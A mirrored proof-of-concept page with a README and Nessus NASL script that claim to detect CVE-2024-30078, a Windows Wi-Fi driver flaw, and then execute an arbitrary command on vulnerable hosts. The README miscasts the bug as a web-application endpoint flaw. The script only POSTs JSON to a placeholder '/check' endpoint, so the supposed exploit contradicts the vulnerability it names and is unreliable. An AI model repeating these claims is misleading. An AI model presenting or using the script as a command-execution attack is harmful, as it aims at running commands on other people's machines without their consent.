Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-30078 PoC — Microsoft Windows Wi-Fi Driver 输入验证错误漏洞

Source
https://github.com/lvyitian/CVE-2024-30078-
Associated Vulnerability
Title:Microsoft Windows Wi-Fi Driver 输入验证错误漏洞 (CVE-2024-30078)
Description:Microsoft Windows是美国微软(Microsoft)公司的一套个人设备使用的操作系统。 Microsoft Windows Wi-Fi Driver存在输入验证错误漏洞。攻击者利用该漏洞可以远程执行代码。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Syste
Description
CVE-2024-30078 Detection and Command Execution Script
Readme
# CVE-2024-30078 Detection and Command Execution Script

This project contains a NASL script that detects the CVE-2024-30078 vulnerability and executes a specified command if the target is vulnerable. The script is designed to work with the Nessus tool, automatically handling target IP addresses and ports provided by Nessus during a scan.

# Cyber Security Consultant <p><a href="https://www.linkedin.com/in/alperen-ugurlu-7b57b7178/">Alperen Ugurlu</a></p>

<picture>
<source
  srcset="https://github-readme-stats.vercel.app/api?username=alperenugurlu&show_icons=true&theme=dark"
  media="(prefers-color-scheme: dark)"
/>
<source
  srcset="https://github-readme-stats.vercel.app/api?username=alperenugurlu&show_icons=true"
  media="(prefers-color-scheme: light), (prefers-color-scheme: no-preference)"
/>
<img src="https://github-readme-stats.vercel.app/api?username=alperenugurlu&show_icons=true" />
</picture>


## What is CVE-2024-30078?

CVE-2024-30078 is a critical vulnerability found in certain web applications or services that allows remote attackers to execute arbitrary commands on the affected system. This vulnerability arises due to improper input validation in the application's endpoint, which can be exploited by sending crafted HTTP requests.

## How to Use

### Save the Script

Save the following NASL script as `cve_2024_30078_check.nasl`.

```nasl
if (description)
{
  script_id(123456);  # Unique script ID
  script_version("1.2");
  script_cve_id("CVE-2024-30078");
  script_name("CVE-2024-30078 Detection and Command Execution");
  script_summary("Detects CVE-2024-30078 vulnerability and executes a command if vulnerable.");

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family("Web Servers");
  script_copyright("Your Name");
  script_dependencies("http_func.inc", "http_keepalive.inc");

  exit(0);
}

# Include necessary Nessus libraries
include("http_func.inc");
include("http_keepalive.inc");

# Define the endpoint and command to be executed
endpoint = "/check";  # Replace with the actual endpoint
command = "your_command_here";  # Replace with the actual command to be executed

# Function to check vulnerability and execute command
function check_vulnerability_and_execute(ip, port, endpoint, command)
{
  # Construct the URL and payload for the vulnerability check
  url = string("http://", ip, ":", port, endpoint);
  payload = string(
    'POST ', endpoint, ' HTTP/1.1\r\n',
    'Host: ', ip, '\r\n',
    'Content-Type: application/json\r\n',
    'Content-Length: 42\r\n',
    '\r\n',
    '{"command":"check_vulnerability","cve":"CVE-2024-30078"}'
  );

  # Send the request and receive the response
  response = http_send_recv(data:payload, port:port);

  # Check if the response indicates vulnerability
  if ("\"vulnerable\": true" >< response[2])
  {
    security_hole(port);  # Report the vulnerability

    # Construct the payload for command execution
    payload_command = string(
      'POST ', endpoint, ' HTTP/1.1\r\n',
      'Host: ', ip, '\r\n',
      'Content-Type: application/json\r\n',
      'Content-Length: ', strlen(command) + 23, '\r\n',
      '\r\n',
      '{"command":"', command, '"}'
    );

    # Send the request to execute the command
    http_send_recv(data:payload_command, port:port);
  }
  else
  {
    security_note(port);  # Report that the target is not vulnerable
  }
}

# Get the list of target IP addresses and open ports from Nessus
targets = get_host_open_ports();

# Iterate over each target and check for the vulnerability
foreach target (targets)
{
  ip = target["host"];
  port = target["port"];
  check_vulnerability_and_execute(ip, port, endpoint, command);
}

#Upload the Script to Nessus
Upload the cve_2024_30078_check.nasl file to the Nessus plugins directory. This directory is typically located at /opt/nessus/lib/nessus/plugins/.

#Create or Edit a Policy in Nessus
In the Nessus user interface, create a new policy or edit an existing policy.
Go to the Advanced section and find the option to add a NASL or Custom script.
Add the cve_2024_30078_check.nasl script to the policy and save it.

#Run the Scan
Create a new scan in the Nessus interface and select the policy that includes the cve_2024_30078_check.nasl script.
Start the scan and wait for the results.
The scan results will indicate which targets are vulnerable to CVE-2024-30078 and will execute the specified command on those targets.

#Notes
Replace the endpoint variable with the actual endpoint of the target system.
Replace the command variable with the command you wish to execute.
The script will automatically handle IP addresses and ports provided by Nessus.
File Snapshot

 [4.0K]  /data/pocs/fe604b03034e871e2a34be3f0249e55e8a684a14
├── [2.9K]  cve_2024_30078_check.nasl
├── [ 34K]  LICENSE
└── [4.5K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.